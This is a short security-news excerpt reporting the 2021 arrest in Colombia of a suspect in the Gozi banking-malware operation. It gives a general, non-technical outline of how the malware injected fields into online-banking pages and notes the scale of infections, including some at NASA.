Security News > 2021 > June > Colombian police arrest Gozi malware suspect after 8 years at large

Colombian police arrest Gozi malware suspect after 8 years at large
2021-06-30 20:19

The troika was wanted for allegedly operating a bank-raiding crimeware "Service" known as Gozi, based on zombie malware that used a technique known as HTML injection to trick victims into revealing personal information relating to their on-line banking.

But if you can plant malware on the victim's PC, you can use what's known as an MiTB attack, or "Manipulator in the browser".

Only then do you inject content into the HTML in order to modify the form, for example to request additional security information that wouldn't normally be needed at that point.

Finally, you exfiltrate the extra data entered by the victim by sending it somewhere other than the bank.

Using the stolen data, the Gozi crooks could then raid the victim's bank account, with the US Department of Justice noting at the time that there were at least 17,000 Gozi malware infections in the US alone, including 160 at NASA. It seems that rocket scientists aren't aren't just people of interest to cybercrooks for the latest spaceplane plans - their bank account details are valuable, too.

Kuzmin was said to have been what you might call the COO of the "Business", hiring coders to write the Gozi malware and operating the Crimeware-as-a-Service business based around it.


News URL

https://nakedsecurity.sophos.com/2021/06/30/colombian-police-arrest-gozi-malware-suspect-after-8-years-at-large/